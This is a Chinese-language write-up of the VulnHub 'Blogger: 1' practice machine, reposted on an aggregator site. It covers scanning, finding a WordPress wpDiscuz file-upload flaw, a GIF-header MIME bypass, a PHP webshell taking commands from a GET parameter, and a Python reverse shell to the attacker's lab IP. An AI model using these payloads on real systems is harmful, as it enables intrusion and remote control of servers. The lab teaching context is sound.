靶机渗透BLOGGER: 1

Posted 2022-11-27 独角授

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了靶机渗透BLOGGER: 1相关的知识，希望对你有一定的参考价值。

【靶机渗透】BLOGGER: 1

0x01靶机介绍

1.详情

链接: https://www.vulnhub.com/entry/blogger-1,675/

2.描述

James M Brunner, A Web Developer has recently created a blog website. He hired you to test the Security of his Blog Website. Hack Your Way In Mr. Robot Style 😃

一位Web 开发人员 James M Brunner 最近创建了一个博客网站。他雇佣你来测试他博客网站的安全性。以机器人先生的风格破解你的方式 : )

0x02环境搭建

1. 下载靶机

官网链接直接下载

2. 创建靶机

下载好后直接将ova文件拖入VMware虚拟机即可，也可以使用VirtualBox 创建

3. 开启靶机

点击 ▶开启此虚拟机

0x03靶机渗透

攻击机使用Kali Linux （IP：192.168.64.128）

1. 主机发现

arp-scan -l

发现目标主机192.168.64.136

2.端口扫描

masscan 192.168.64.136 --rate=10000 --ports 0-65535

识别到2个开放的tcp端口22，80

3. 服务扫描

nmap -T4 -sV -p22,80 -O 192.168.64.136

-sV服务版本 -T4速度(最高为5，推荐用4) -O系统 -p 指定端口

22是ssh，80是Apache http服务

到现在有两个思路

(1)ssh爆破

(2)web漏洞入侵

先进行web信息收集

4. web信息收集

访问http://192.168.64.136/

（添加Hosts的话可直接访问http://blogger.thm/）

主页上没有可以利用的地方，登录处会跳转到主页

接下来进行目录扫描，看能否找到可利用信息，用的工具是kali自带的dirb目录扫描工具，这里使用默认字典

dirb http://192.168.64.136/

dirb http://blogger.thm/

目录遍历漏洞，看看有没有可以利用的地方

在/assets/fonts发现 blog/文件夹

点开后发现是一个wordpress的站点

再用wpscan工具扫描该站点是否存在漏洞,可能是wpscan api的原因，并未扫到什么

在网站文章评论处发现好像是WordPress评论插件wpDiscuz，F12查看源码验证，果真是wpDiscuz

wpDiscuz插件有任意文件上传漏洞

0x04漏洞利用

1. 上传webshell

点击评论栏图片标签，上传phpinfo文件，用Burp抓包

wpDiscuz插件会使用mime_content_type函数来获取MIME类型，但是该函数在获取MIME类型是通过文件的十六进制起始字节来判断，所以只要文件头符合图片类型即可绕过

加上GIF头，也可用图片马

(1)GIF89a<?php phpinfo();?>

成功上传，并返回路径

http:\\/\\/blogger.thm\\/assets\\/fonts\\/blog\\/wp-content\\/uploads\\/2021\\/06\\/1-1623883409.7783.php

(2)图片马

图片马上传成功

返回路径。

访问phpinfo

接下来就是上传反弹shell

GIF89a<?php @system($_GET['cmd']); ?>

2. 反弹shell

使用harkbar工具传递执行python反弹shell

python3 -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.64.128",7777));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);'